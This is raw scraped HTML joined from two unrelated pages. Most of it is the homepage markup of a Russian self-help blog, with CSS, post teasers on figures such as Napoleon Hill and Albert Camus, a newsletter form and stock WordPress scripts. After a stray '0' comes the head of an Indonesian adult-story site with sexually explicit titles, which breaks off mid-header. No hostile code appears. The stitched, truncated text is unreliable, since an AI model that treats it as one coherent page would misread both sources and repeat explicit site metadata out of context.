#d34836;}.sidebar .tagcloud a:hover,.entry-footer .meta-tags a:hover,.smr-pagination a,.smr-pagination .page-numbers.current,.comment-list .comment-reply-link,.smr-author-box .smr-author-link,.more-link,.smr-pagelinks-nav a,.mks_autor_link_wrap a{border: 1px solid rgba(211,72,54,0.7)}.smr-pagination a:hover,.smr-pagination .page-numbers.current{background: #d34836;}.smr-format-action,.smr-format-action:hover,.comment-list .comment-reply-link:hover,.smr-author-box .smr-author-link:hover,.entry-content p .more-link:hover,.smr-pagelinks-nav a:hover,.mks_autor_link_wrap a:hover{color: #FFF;background: #d34836;}h1,h2,h3,h4,h5,h6,.h1,.h2,.h3,.h4,.h5,.h6,.entry-title a,.main-navigation a,.smr-nav-social a,.smr-nav-search button.smr-search-submit,.site-header .site-title a,.smr-post.format-video .entry-header .entry-title,.smr-post.format-gallery .entry-header .entry-title,.smr-post.format-audio .entry-header .entry-title,.smr-post.format-image .entry-header .entry-title,.smr-post.format-video .entry-header .entry-title a,.smr-post.format-gallery .entry-header .entry-title a,.smr-post.format-audio .entry-header .entry-title a,.smr-post.format-image .entry-header .entry-title a{color: #333333;}.post-categories a{background: #ffeb79;}.entry-meta .meta-item, .entry-meta span, .entry-meta a,.comment-metadata a,.entry-footer .meta-tags a,.smr-nofimg .has-post-thumbnail .entry-meta .meta-item, .smr-nofimg .has-post-thumbnail .entry-meta span, .smr-nofimg .has-post-thumbnail .entry-meta a,.smr-post.format-video .entry-header .entry-meta *,.smr-post.format-audio .entry-header .entry-meta *,.smr-post.format-gallery .entry-header .entry-meta *,.smr-post.format-image .entry-header .entry-meta *,.tagcloud a,.post-date,.sidebar .comment-author-link,.rss-date{color: #999999;}.smr-resp-separator{background: rgba(153,153,153,0.3);}input[type="text"],input[type="email"],input[type="url"],input[type="password"],textarea,select,.widget select{border: 1px solid rgba(153,153,153,0.7)}.entry-footer .meta-tags a,blockquote,.smr-post{border-color: rgba(153,153,153,0.3);}.comment-form .form-submit .submit,.mks_autor_link_wrap a,button, html input[type="button"], input[type="reset"], input[type="submit"]{border: 1px solid rgba(211,72,54,0.7);color: #d34836;}hr{border-top: 1px solid rgba(153,153,153,0.3);}.error404 .entry-content .smr-search-form .smr-search-submit,.not-found .smr-search-form .smr-search-submit{color: #333333;background: transparent;}.comment-form .form-submit .submit:hover,button:hover,html input[type="button"]:hover, input[type="reset"]:hover, input[type="submit"]:hover{color: #FFF;background: #d34836;}.site-footer a{color: #ffffff;}.mobile-nav{background: #d34836;}@media (max-width: 620px){.smr-post.has-post-thumbnail .entry-header .entry-title, .smr-post.has-post-thumbnail .entry-header .entry-title a{color: #333333;}.has-post-thumbnail .entry-meta .meta-item, .has-post-thumbnail .entry-meta span, .has-post-thumbnail .entry-meta a{color: #999999;}.has-post-thumbnail .entry-meta a:hover{color: #d34836;}} </style> <link rel='stylesheet' id='meks_instagram-widget-styles-css' href='http://ezopage.com/wp-content/plugins/meks-easy-instagram-widget/css/widget.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='mc4wp-form-themes-css' href='http://ezopage.com/wp-content/plugins/mailchimp-for-wp/assets/css/form-themes.min.css?ver=4.5.2' type='text/css' media='all' /> <script type='text/javascript' src='http://ezopage.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://ezopage.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='https://ezopage.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://ezopage.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://ezopage.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel="icon" href="https://ezopage.com/wp-content/uploads/2017/08/cropped-dp-32x32.png" sizes="32x32" /> <link rel="icon" href="https://ezopage.com/wp-content/uploads/2017/08/cropped-dp-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://ezopage.com/wp-content/uploads/2017/08/cropped-dp-180x180.png" /> <meta name="msapplication-TileImage" content="https://ezopage.com/wp-content/uploads/2017/08/cropped-dp-270x270.png" /> </head> <body class="home blog"> <div id="wrapper"> <header id="masthead" class="container site-header" role="banner"> <div class="col-lg-12 col-sm-12 col-xs-12"> <div class="site-branding"> <h1 class="site-title h1"><a href="https://ezopage.com/" rel="home"><img src="https://ezopage.com/wp-content/uploads/2019/03/logo-DP.png" alt="Дневник Познания"/></a></h1> </div> <div class="site-navigation-wrapper"> <div id="smr-nav-social-wrap" class="smr-nav-social-wrap"> <ul id="smr-nav-social" class="smr-nav-social"><li id="menu-item-136" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-136"><a href="https://www.facebook.com/ezopage/"><span class="smr-social-name">Страница в Facebook</span></a></li> <li id="menu-item-730" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-730"><a href="https://www.instagram.com/ezopages/"><span class="smr-social-name">Дневник в Instagram</span></a></li> <li id="menu-item-1655" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1655"><a href="https://t.me/ezopage"><span class="smr-social-name">Канал Telegram</span></a></li> </ul> </div> <div id="smr-nav-search" class="smr-nav-search"> <form class="smr-search-form" action="https://ezopage.com/" method="get"> <input name="s" class="smr-search-input" size="20" type="text" value="Пишите здесь для поиска..." onfocus="(this.value == 'Пишите здесь для поиска...') && (this.value = '')" onblur="(this.value == '') && (this.value = 'Пишите здесь для поиска...')" placeholder="Пишите здесь для поиска..." /> <button type="submit" class="smr-search-submit"><i class="fa fa-search"></i></button> </form> </div> <nav id="site-navigation" class="main-navigation" role="navigation"> <ul id="smr-main-nav" class="smr-main-nav"><li id="menu-item-2283" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2283"><a href="https://ezopage.com/category/psihologiya/">Психология</a></li> <li id="menu-item-2285" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2285"><a href="https://ezopage.com/category/vdohnovenie/">Вдохновение</a></li> <li id="menu-item-2287" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2287"><a href="https://ezopage.com/category/samorazvitie/">Саморазвитие</a></li> <li id="menu-item-2288" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2288"><a href="https://ezopage.com/category/philosophy/">Философия</a></li> <li id="menu-item-2289" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2289"><a href="https://ezopage.com/category/prosperity/">Достаток</a></li> <li id="menu-item-2284" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2284"><a href="https://ezopage.com/category/view/">Мнение</a></li> </ul> </nav> </div> <span class="smr-hamburger"><i class="fa fa-bars"></i></span> <div class="smr-resp-separator"></div> </div> </header> <div id="content" class="container site-content"> <div id="primary" class="content-area col-lg-9 col-md-8 col-sm-12 col-xs-12"> <main id="main" class="site-main" role="main"> <article id="post-3231" class="smr-post post-3231 post type-post status-publish format-standard has-post-thumbnail hentry category-vdohnovenie tag-must-read tag-sila-mysli"> <div class="entry-header-wrapper"> <figure class="post-thumbnail"> <a href="https://ezopage.com/napoleon-hill-5-etapov-samoutverzhdeniya/"><img width="805" height="433" src="https://ezopage.com/wp-content/uploads/2019/05/napoleon-hill-805x433.jpg" class="attachment-smr-thumb size-smr-thumb wp-post-image" alt="" /></a> </figure> <header class="entry-header"> <ul class="post-categories"> <li><a href="https://ezopage.com/category/vdohnovenie/" rel="category tag">Вдохновение</a></li></ul> <h2 class="entry-title"><a href="https://ezopage.com/napoleon-hill-5-etapov-samoutverzhdeniya/" rel="bookmark">Наполеон Хилл: 5 этапов самоутверждения</a></h2> </header> </div> <div class="entry-content"> <p>1. Цель моей жизни мне понятна, и у меня есть все возможности для ее достижения. Поэтому я требую от себя настойчивости. Я требую от себя — не оставлять усилий. Не сходя с этого места и не откладывая на потом, я обещаю себе сделать для этого все, что в моих силах.</p> <p><a href="https://ezopage.com/napoleon-hill-5-etapov-samoutverzhdeniya/" class="more-link">Читать далее</a></p> </div> </article> <article id="post-3226" class="smr-post post-3226 post type-post status-publish format-standard has-post-thumbnail hentry category-view tag-obshhestvo tag-tsitaty"> <div class="entry-header-wrapper"> <figure class="post-thumbnail"> <a href="https://ezopage.com/prorocheskie-vyskazyvaniya-dzhordzha-oruella/"><img width="805" height="433" src="https://ezopage.com/wp-content/uploads/2019/05/oruel-805x433.jpg" class="attachment-smr-thumb size-smr-thumb wp-post-image" alt="" /></a> </figure> <header class="entry-header"> <ul class="post-categories"> <li><a href="https://ezopage.com/category/view/" rel="category tag">Мнение</a></li></ul> <h2 class="entry-title"><a href="https://ezopage.com/prorocheskie-vyskazyvaniya-dzhordzha-oruella/" rel="bookmark">Пророческие высказывания Джорджа Оруэлла</a></h2> </header> </div> <div class="entry-content"> <p>Пророческие высказывания от автора культовых антиутопических романов об ужасах тоталитарных режимов, которые в наши дни снова приобретают достаточно тревожные звучания.</p> <p><a href="https://ezopage.com/prorocheskie-vyskazyvaniya-dzhordzha-oruella/" class="more-link">Читать далее</a></p> </div> </article> <article id="post-3222" class="smr-post post-3222 post type-post status-publish format-standard has-post-thumbnail hentry category-vdohnovenie tag-osoznannost tag-ekhart-tolle"> <div class="entry-header-wrapper"> <figure class="post-thumbnail"> <a href="https://ezopage.com/prostaya-no-glubokaya-mudrost-poddavatsya-techeniyu-zhizni/"><img width="805" height="433" src="https://ezopage.com/wp-content/uploads/2019/05/sila-nastoyashego-805x433.jpg" class="attachment-smr-thumb size-smr-thumb wp-post-image" alt="" /></a> </figure> <header class="entry-header"> <ul class="post-categories"> <li><a href="https://ezopage.com/category/vdohnovenie/" rel="category tag">Вдохновение</a></li></ul> <h2 class="entry-title"><a href="https://ezopage.com/prostaya-no-glubokaya-mudrost-poddavatsya-techeniyu-zhizni/" rel="bookmark">Простая, но глубокая мудрость поддаваться течению жизни</a></h2> </header> </div> <div class="entry-content"> <p>Для некоторых людей понятие уступания может иметь негативный смысл, заключающий в себе представление о поражении, капитуляции, неудавшихся попытках отвечать на вызовы жизни, о впадении в летаргию и т. д. Однако истинное уступание совершенно не похоже на это. Совсем не...</p> <p><a href="https://ezopage.com/prostaya-no-glubokaya-mudrost-poddavatsya-techeniyu-zhizni/" class="more-link">Читать далее</a></p> </div> </article> <article id="post-3218" class="smr-post post-3218 post type-post status-publish format-standard has-post-thumbnail hentry category-vdohnovenie tag-alber-kamyu tag-persony tag-samorealizatsiya"> <div class="entry-header-wrapper"> <figure class="post-thumbnail"> <a href="https://ezopage.com/alber-kamyu-tvorchestvo-otodvigayushhee-smert/"><img width="805" height="433" src="https://ezopage.com/wp-content/uploads/2019/05/al-kamyu-805x433.jpg" class="attachment-smr-thumb size-smr-thumb wp-post-image" alt="" /></a> </figure> <header class="entry-header"> <ul class="post-categories"> <li><a href="https://ezopage.com/category/vdohnovenie/" rel="category tag">Вдохновение</a></li></ul> <h2 class="entry-title"><a href="https://ezopage.com/alber-kamyu-tvorchestvo-otodvigayushhee-smert/" rel="bookmark">Альбер Камю: творчество, отодвигающее смерть</a></h2> </header> </div> <div class="entry-content"> <p>Альбер Камю победил болезнь, считавшуюся неизлечимой, хотя и не переиграл судьбу. Тем не менее, завершив свое земное странствие в 46 лет, знаток природы человеческой оставил собственный способ противостояния тяжелой болезни и гнетущей личной трагедии.</p> <p><a href="https://ezopage.com/alber-kamyu-tvorchestvo-otodvigayushhee-smert/" class="more-link">Читать далее</a></p> </div> </article> <article id="post-3215" class="smr-post post-3215 post type-post status-publish format-standard has-post-thumbnail hentry category-vdohnovenie tag-byt-schastlivym tag-myshlenie tag-emotsionalnaya-sfera"> <div class="entry-header-wrapper"> <figure class="post-thumbnail"> <a href="https://ezopage.com/luule-viilma-nedovolstvo-istreblyaet-volyu-k-zhizni/"><img width="805" height="433" src="https://ezopage.com/wp-content/uploads/2019/05/nedovostvo-805x433.jpg" class="attachment-smr-thumb size-smr-thumb wp-post-image" alt="" /></a> </figure> <header class="entry-header"> <ul class="post-categories"> <li><a href="https://ezopage.com/category/vdohnovenie/" rel="category tag">Вдохновение</a></li></ul> <h2 class="entry-title"><a href="https://ezopage.com/luule-viilma-nedovolstvo-istreblyaet-volyu-k-zhizni/" rel="bookmark">Лууле Виилма: Недовольство истребляет волю к жизни</a></h2> </header> </div> <div class="entry-content"> <p>Нескончаемое недовольство &#8212; удел испуганного человека, оно истребляет волю к жизни. Ослабление воли к жизни способствует возникновению болезней.</p> <p><a href="https://ezopage.com/luule-viilma-nedovolstvo-istreblyaet-volyu-k-zhizni/" class="more-link">Читать далее</a></p> </div> </article> </main> <nav id="smr-pagination" class="smr-pagination"> <span aria-current='page' class='page-numbers current'>1</span> <a class='page-numbers' href='https://ezopage.com/page/2/'>2</a> <a class='page-numbers' href='https://ezopage.com/page/3/'>3</a> <span class="page-numbers dots">&hellip;</span> <a class='page-numbers' href='https://ezopage.com/page/130/'>130</a> <a class="next page-numbers" href="https://ezopage.com/page/2/">Следующие</a> </nav> </div> <div id="sidebar" class="sidebar col-lg-3 widget-area col-md-4 col-sm-4 col-xs-12" role="complementary"> <div id="custom_html-2" class="widget_text widget widget_custom_html"><h4 class="widget-title"><span>Постоянному читателю:</span></h4><div class="textwidget custom-html-widget"><em>Лучшие истории недели на ваш email</em> <script>(function() { if (!window.mc4wp) { window.mc4wp = { listeners: [], forms : { on: function (event, callback) { window.mc4wp.listeners.push({ event : event, callback: callback }); } } } } })(); </script><!-- Mailchimp for WordPress v4.5.2 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-31 mc4wp-form-theme mc4wp-form-theme-red" method="post" data-id="31" data-name="Подписка" ><div class="mc4wp-form-fields"><p> <input type="email" name="EMAIL" placeholder="Ваш адрес email" required /> </p> <p> <input type="submit" value="Получать" /> </p></div><label style="display: none !important;">Оставьте это поле пустым, если вы человек: <input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></label><input type="hidden" name="_mc4wp_timestamp" value="1558021279" /><input type="hidden" name="_mc4wp_form_id" value="31" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /><div class="mc4wp-response"></div></form><!-- / Mailchimp for WordPress Plugin --></div></div><div id="shamrock_posts_widget-3" class="widget shamrock_posts_widget"><h4 class="widget-title"><span>Самое обсуждаемое:</span></h4> <ul> <li> <a href="https://ezopage.com/dogmaty-very-v-otnoshenii-deneg/" title="Догматы веры в отношении денег"> <img width="150" height="150" src="https://ezopage.com/wp-content/uploads/2017/09/dengi-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" /> </a> <a href="https://ezopage.com/dogmaty-very-v-otnoshenii-deneg/" title="Догматы веры в отношении денег">Догматы веры в отношении денег</a> </li> <li> <a href="https://ezopage.com/biohimiya-tela-kak-produkt-soznaniya/" title="Биохимия тела как продукт сознания"> <img width="150" height="150" src="https://ezopage.com/wp-content/uploads/2018/03/kvantovoe-soznanie-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" /> </a> <a href="https://ezopage.com/biohimiya-tela-kak-produkt-soznaniya/" title="Биохимия тела как продукт сознания">Биохимия тела как продукт сознания</a> </li> <li> <a href="https://ezopage.com/kak-otkaz-ot-alkogolya-vliyaet-na-zhizn/" title="Как отказ от алкоголя влияет на жизнь"> <img width="150" height="150" src="https://ezopage.com/wp-content/uploads/2017/12/no-alcohol-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="отказ от алкоголя" /> </a> <a href="https://ezopage.com/kak-otkaz-ot-alkogolya-vliyaet-na-zhizn/" title="Как отказ от алкоголя влияет на жизнь">Как отказ от алкоголя влияет на жизнь</a> </li> <li> <a href="https://ezopage.com/v-biblii-net-ekstremizma/" title="В Библии нет экстремизма?"> <img width="150" height="150" src="https://ezopage.com/wp-content/uploads/2018/02/bible-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="" /> </a> <a href="https://ezopage.com/v-biblii-net-ekstremizma/" title="В Библии нет экстремизма?">В Библии нет экстремизма?</a> </li> <li> <a href="https://ezopage.com/stih-o-dualnosti-razuma/" title="Стих о дуальности разума"> <img width="150" height="150" src="https://ezopage.com/wp-content/uploads/2017/08/dualnyj-razum-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="дуальный разум" /> </a> <a href="https://ezopage.com/stih-o-dualnosti-razuma/" title="Стих о дуальности разума">Стих о дуальности разума</a> </li> <li> <a href="https://ezopage.com/prekratit-kurit/" title="Как Прекратить курить"> <img width="150" height="150" src="https://ezopage.com/wp-content/uploads/2017/02/prekratit-kurit-150x150.jpg" class="attachment-thumbnail size-thumbnail wp-post-image" alt="Как прекратить курить" /> </a> <a href="https://ezopage.com/prekratit-kurit/" title="Как Прекратить курить">Как Прекратить курить</a> </li> </ul> </div></div> </div> </div> <footer id="footer" class="site-footer" role="contentinfo"> <div class="container"> <div class="col-lg-12"> <div class="site-info"> <!--&copy; 2019. Автор темы: <a href="http://mekshq.com" target="_blank">Meks</a>. Сайт работает на <a href="http://wordpress.org" target="_blank">WordPress</a>.--> 2019 ezopage.com | <a href="https://ezopage.com/obratnaya-svyaz/" target="_blank" rel="noopener noreferrer">Обратная связь</a> | <a href="https://ezopage.com/main/" target="_blank" rel="noopener noreferrer">О проекте</a> </div> <ul id="smr-nav-footer" class="smr-nav-footer"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-136"><a href="https://www.facebook.com/ezopage/">Страница в Facebook</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-730"><a href="https://www.instagram.com/ezopages/">Дневник в Instagram</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1655"><a href="https://t.me/ezopage">Канал Telegram</a></li> </ul> </div> </div> </footer> <div class="mobile-nav"> <ul id="menu-main" class="smr-res-nav"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2283"><a href="https://ezopage.com/category/psihologiya/">Психология</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2285"><a href="https://ezopage.com/category/vdohnovenie/">Вдохновение</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2287"><a href="https://ezopage.com/category/samorazvitie/">Саморазвитие</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2288"><a href="https://ezopage.com/category/philosophy/">Философия</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2289"><a href="https://ezopage.com/category/prosperity/">Достаток</a></li> <li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-2284"><a href="https://ezopage.com/category/view/">Мнение</a></li> </ul> <div id="smr-res-social-wrap" class="smr-res-social-wrap"> <ul id="smr-res-social" class="smr-nav-social"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-136"><a href="https://www.facebook.com/ezopage/"><span class="smr-social-name">Страница в Facebook</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-730"><a href="https://www.instagram.com/ezopages/"><span class="smr-social-name">Дневник в Instagram</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1655"><a href="https://t.me/ezopage"><span class="smr-social-name">Канал Telegram</span></a></li> </ul> </div> <div id="smr-res-search" class="smr-res-search"> <form class="smr-search-form" action="https://ezopage.com/" method="get"> <input name="s" class="smr-search-input" size="20" type="text" value="Пишите здесь для поиска..." onfocus="(this.value == 'Пишите здесь для поиска...') && (this.value = '')" onblur="(this.value == '') && (this.value = 'Пишите здесь для поиска...')" placeholder="Пишите здесь для поиска..." /> <button type="submit" class="smr-search-submit"><i class="fa fa-search"></i></button> </form> </div> <a href="#" class="close-btn"><i class="fa fa-close"></i></a> </div> <script>(function() {function addEventListener(element,event,handler) { if(element.addEventListener) { element.addEventListener(event,handler, false); } else if(element.attachEvent){ element.attachEvent('on'+event,handler); } }function maybePrefixUrlField() { if(this.value.trim() !== '' && this.value.indexOf('http') !== 0) { this.value = "http://" + this.value; } } var urlFields = document.querySelectorAll('.mc4wp-form input[type="url"]'); if( urlFields && urlFields.length > 0 ) { for( var j=0; j < urlFields.length; j++ ) { addEventListener(urlFields[j],'blur',maybePrefixUrlField); } }/* test if browser supports date fields */ var testInput = document.createElement('input'); testInput.setAttribute('type', 'date'); if( testInput.type !== 'date') { /* add placeholder & pattern to all date fields */ var dateFields = document.querySelectorAll('.mc4wp-form input[type="date"]'); for(var i=0; i<dateFields.length; i++) { if(!dateFields[i].placeholder) { dateFields[i].placeholder = 'YYYY-MM-DD'; } if(!dateFields[i].pattern) { dateFields[i].pattern = '[0-9]{4}-(0[1-9]|1[012])-(0[1-9]|1[0-9]|2[0-9]|3[01])'; } } } })();</script><script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/ezopage.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='http://ezopage.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='http://ezopage.com/wp-content/themes/shamrock/js/jquery.owl.carousel.min.js?ver=1.1'></script> <script type='text/javascript' src='http://ezopage.com/wp-content/themes/shamrock/js/jquery.magnific-popup.min.js?ver=1.1'></script> <script type='text/javascript' src='http://ezopage.com/wp-content/themes/shamrock/js/jquery.fitvids.js?ver=1.1'></script> <script type='text/javascript' src='http://ezopage.com/wp-content/themes/shamrock/js/custom.js?ver=1.1'></script> <script type='text/javascript' src='https://use.fontawesome.com/30858dc40a.js?ver=4.0.7'></script> <script type='text/javascript' src='http://ezopage.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js?ver=3.0.25'></script> <script type='text/javascript'> /* <![CDATA[ */ var mc4wp_forms_config = []; /* ]]> */ </script> <script type='text/javascript' src='http://ezopage.com/wp-content/plugins/mailchimp-for-wp/assets/js/forms-api.min.js?ver=4.5.2'></script> <!--[if lte IE 9]> <script type='text/javascript' src='http://ezopage.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=4.5.2'></script> <![endif]--> </body> </html>
0
<!DOCTYPE html> <!--[if IE 8]> <html class="ie ie8" lang="en-US"> <![endif]--> <!--[if IE 9]> <html class="ie ie9" lang="en-US"> <![endif]--> <!--[if gt IE 9]><!--> <html lang="en-US"> <!--<![endif]--> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="pingback" href="https://doephotog.com/xmlrpc.php"/> <title>Cerita Sex Cerita Porno Hot Memek Eva Berdenyut | Cerita Dewasa</title> <!-- Start The SEO Framework by Sybre Waaijer --> <meta name="description" content="Latest posts: Blog on Cerita Dewasa&#8230;" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Cerita Sex Cerita Porno Hot Memek Eva Berdenyut | Cerita Dewasa" /> <meta property="og:description" content="Latest posts: Blog on Cerita Dewasa&#8230;" /> <meta property="og:url" content="https://doephotog.com/cerita-sex-cerita-porno-hot-memek-eva-berdenyut/" /> <meta property="og:site_name" content="Cerita Dewasa" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:title" content="Cerita Sex Cerita Porno Hot Memek Eva Berdenyut | Cerita Dewasa" /> <meta name="twitter:description" content="Latest posts: Blog on Cerita Dewasa&#8230;" /> <link rel="canonical" href="https://doephotog.com/cerita-sex-cerita-porno-hot-memek-eva-berdenyut/" /> <link rel="next" href="https://doephotog.com/cerita-sex-cerita-porno-hot-memek-eva-berdenyut/page/2/" /> <!-- End The SEO Framework by Sybre Waaijer | 0.00449s --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Cerita Dewasa &raquo; Feed" href="https://doephotog.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Cerita Dewasa &raquo; Comments Feed" href="https://doephotog.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/doephotog.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <style type="text/css" media="all"> .wpautoterms-footer{background-color:#ffffff;text-align:center;} .wpautoterms-footer a{color:#000000;font-family:Arial, sans-serif;font-size:14px;} .wpautoterms-footer .separator{color:#cccccc;font-family:Arial, sans-serif;font-size:14px;}</style> <link rel='stylesheet' id='wpautoterms_css-css' href='https://doephotog.com/wp-content/plugins/auto-terms-of-service-and-privacy-policy/css/wpautoterms.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://doephotog.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='colorbox-css-css' href='https://doephotog.com/wp-content/plugins/easy-image-display/css/colorbox.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='better-framework-main-fonts-css' href='https://fonts.googleapis.com/css?family=Lato:400,700%7CRoboto:400,500,400italic' type='text/css' media='all' /> <script>if (document.location.protocol != "https:") {document.location = document.URL.replace(/^http:/i, "https:");}</script><script type='text/javascript' src='https://doephotog.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://doephotog.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://doephotog.com/wp-content/themes/publisher/includes/libs/better-framework/assets/js/html5shiv.min.js?ver=3.7.1'></script> <![endif]--> <!--[if lt IE 9]> <script type='text/javascript' src='https://doephotog.com/wp-content/themes/publisher/includes/libs/better-framework/assets/js/respond.min.js?ver=3.7.1'></script> <![endif]--> <link rel='https://api.w.org/' href='https://doephotog.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://doephotog.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://doephotog.com/wp-includes/wlwmanifest.xml" /> <link rel="amphtml" href="https://doephotog.com/amp/"/> <script type="application/ld+json">{ "@context": "http:\/\/schema.org\/", "@type": "organization", "@id": "#organization", "url": "https:\/\/doephotog.com\/", "name": "Cerita Dewasa", "description": "Koleksi Terbaru" }</script> <script type="application/ld+json">{ "@context": "http:\/\/schema.org\/", "@type": "WebSite", "name": "Cerita Dewasa", "alternateName": "Koleksi Terbaru", "url": "https:\/\/doephotog.com\/", "potentialAction": { "@type": "SearchAction", "target": "https:\/\/doephotog.com\/search\/{search_term}", "query-input": "required name=search_term" } }</script> <link rel='stylesheet' id='bf-minifed-css-1' href='https://doephotog.com/wp-content/bs-booster-cache/b1413444d18d8d4bba76d8748f2dfaf8.css' type='text/css' media='all' /> <link rel='stylesheet' id='5.1.0-1549448589' href='https://doephotog.com/wp-content/bs-booster-cache/b8db127f87f9071f71afb4df178959dd.css' type='text/css' media='all' /> </head> <body data-rsssl=1 class="blog active-light-box active-top-line ltr close-rh page-layout-2-col-right boxed main-menu-sticky-smart active-ajax-search bs-show-ha bs-show-ha-a bs-ll-a elementor-default" dir="ltr"> <div class="main-wrap content-main-wrap"> <header id="header" class="site-header header-style-2 boxed" itemscope="itemscope" itemtype="https://schema.org/WPHeader"> <section class="topbar topbar-style-1 hidden-xs hidden-xs"> <div class="content-wrap"> <div class="container"> <div class="topbar-inner clearfix"> <div class="section-links"> 